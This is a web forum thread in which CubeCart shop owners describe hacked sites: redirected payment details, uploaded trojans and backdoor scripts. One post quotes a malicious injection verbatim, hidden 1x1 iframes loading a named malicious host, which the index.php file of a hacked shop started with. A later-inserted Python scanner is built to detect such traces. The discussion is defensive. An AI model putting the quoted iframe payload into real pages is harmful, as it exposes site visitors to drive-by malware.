
Site hacked again in 2 days


sleepyfrog


My client found out on Thursday that someone had hacked into his site and changed the recipient email for Paypal.

Investigating, I found that a new folder had been created in images/uploads/ and trojan files uploaded.

I deleted the files, changed all the passwords and set the images and upload folders to 755.

Today the hacker has been back and changed the payment processing to eGold.

I have changed back, and deleted all the payment options other than Paypal. I've been onto Cubecart support who say to set permissions of the images folder to 644 - however, when I do the images are no longer shown on the website. The lowest permission that will work is 755.

The hosting company say that the uploads script, which is used in the admin area to upload the photos, is the probable security leak and needs to be disabled as soon as possible.

Can someone tell me where the files are for this feature and how I can remove them?

As the hacker has got into this site very easily you should all be warned to check your own images/upload folder regularly.


I just love it when hosts shift the responsibility for their lack of security to Cube Cart. Who is your host?

The site is hosted by Pipex/Webfusion.

My concern is that they do not seem to be logging in through the admin area with a password, so how else could they be changing the details in the Gateway area?

They managed to disable Paypal, enable eGold with their details and add the by post option, asking for bank transfers to an Asian bank.

I just want a straight answer from someone on how they can still be getting in so I can fix it - rather than everyone blaming everyone else.


I just love it when hosts shift the responsibility for their lack of security to Cube Cart. Who is your host?

Oh I don't know. Some guys were going on about CC and security last night, I told them I had the patch installed and they were going on about something else. Kind of worrying, though it could just be trash talk..


I would check thru all your folders and make sure there are no other files there that shouldn't be. Hackers sometimes upload hidden files (make sure your "show hidden files" option is on btw) that allow them to keep getting access to your account.

Also I'd change your database passwords - I believe he could have made these changes by hacking into your database.

I also agree that it sounds like your hosts aren't very secure either. I had hacking problems on a previous host, but never on my current one. I think it's a matter of a more experienced host as well as exploits.


  • 1 month later...
Guest Pete_bolton

I find folders added to my includes folder all the time. If you run an ecommerce site and use shared hosting you are asking for trouble.

I find this statement worrying, can you explain? I use shared hosting through vodahost.

Would you recommend my own server, or would having my own IP address on my shared hosting help?

Any comments welcome...


With shared hosting anyone on that server has easy access to your files, unless it is set up correctly and secure with Open_basedir, rootjail.....

If it is poorly set up then even if you keep your site up to date and secure others may not. That means others open a backdoor to the server and may walk through all files on the server accessible to the webserver.


  • 2 months later...

My site was hacked too.... I was using Version 3.04 but have since upgraded to the latest version.

I found 2 scripts in the includes/boxes folder that allowed the hacker to login and do anything they wanted to to any of the files and folders.

I have since found that they have yet again attacked the site and left the script below in the first line of the index.php file:

<iframe width=1 height=1 border=0 frameborder=0 src="http://traff.step57.info/mrx/"></iframe><iframe width=1 height=1 border=0 frameborder=0 src="http://traff.step57.info/mrx/"></iframe><iframe width=1 height=1 border=0 frameborder=0 src="http://traff.step57.info/mrx/"></iframe><iframe width=1 height=1 border=0 frameborder=0 src="http://traff.step57.info/mrx/"></iframe><iframe width=1 height=1 border=0 frameborder=0 src="http://traff.step57.info/mrx/"></iframe><!--iframe width=1 height=1 border=0 frameborder=0 src="http://traff.step57.info/mrx/"></iframe--><!--iframe width=1 height=1 border=0 frameborder=0 src="http://traff.step57.info/mrx/"></iframe-->

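A defender-side check for the findings reported in this thread (files dropped under images/uploads, a hidden file beside the scripts in includes/boxes, 1x1 iframes at the top of index.php), added here as an example and not posted by any participant. The directory layout, the `ASSET_DIRS` setting and the sample tree are assumptions constructed for the demo.

```python
import os
import re
import tempfile

# 0- or 1-pixel iframes, the shape of the index.php injection quoted above.
TINY_IFRAME = re.compile(
    r"<iframe\b(?=[^>]*\bwidth\s*=\s*[\"']?[01]\b)"
    r"(?=[^>]*\bheight\s*=\s*[\"']?[01]\b)[^>]*>", re.IGNORECASE)
ASSET_DIRS = ("images",)  # assumption: top-level dirs that hold static files only
SCRIPT_EXTS = (".php", ".phtml", ".php3", ".php5", ".pl", ".cgi")
PAGE_EXTS = (".php", ".html", ".htm", ".tpl")

def scan_webroot(root):
    """Return sorted (relative_path, reason) findings under root."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        top = os.path.relpath(dirpath, root).split(os.sep)[0]
        for name in files:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            if name.startswith("."):
                findings.append((rel, "hidden file"))
            if top in ASSET_DIRS and name.lower().endswith(SCRIPT_EXTS):
                findings.append((rel, "script in asset directory"))
            if name.lower().endswith(PAGE_EXTS):
                with open(path, "r", errors="replace") as fh:
                    hits = len(TINY_IFRAME.findall(fh.read()))
                if hits:
                    findings.append((rel, f"{hits} hidden iframe(s)"))
    return sorted(findings)

def demo():
    """Scan a constructed tree that mimics what the thread reports."""
    frame = '<iframe width=1 height=1 frameborder=0 src="http://bad.example.invalid/x/"></iframe>'
    files = {  # constructed sample data, not taken from a real site
        "index.php": frame * 2 + "<?php echo 'shop'; ?>",
        "about.php": '<iframe width="560" height="315" src="/v"></iframe>',
        "images/uploads/logo.gif": "GIF89a",
        "images/uploads/new/x.php": "<?php /* placeholder */ ?>",
        "includes/boxes/.cache": "placeholder",
    }
    with tempfile.TemporaryDirectory() as root:
        for rel, body in files.items():
            path = os.path.join(root, *rel.split("/"))
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "w") as fh:
                fh.write(body)
        return scan_webroot(root)
```

Each finding is a lead for manual review, and a clean result does not prove the site is clean; comparing the tree against a fresh copy of the installed release catches modified files this heuristic misses.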

Guest mediajunk

If you put traff.step57.info/mrx/ into Google, it identifies it straight away as a malicious site. It seems to have hit a lot of ecommerce sites (like zen cart + oscommerce) and blogs.

step57.info contains scripts on cpanel exploits, so that rules out CC being unsecure I'm guessing.

While searching for it, I found that someone in the oscommerce community has made a fix for it. I downloaded it, but I'm not sure if it's a fix for cpanel or oscommerce, but here it is anyway: Step57 Hack Fix


Guest midwest

HMMM,

Me finds this all very interesting. Especially since my host uses cpanel and they just recently moved me to a different server.

Do believe a call is in order.

Also I believe CC needs to investigate immediately, regardless whose door it is.

midwest ;)
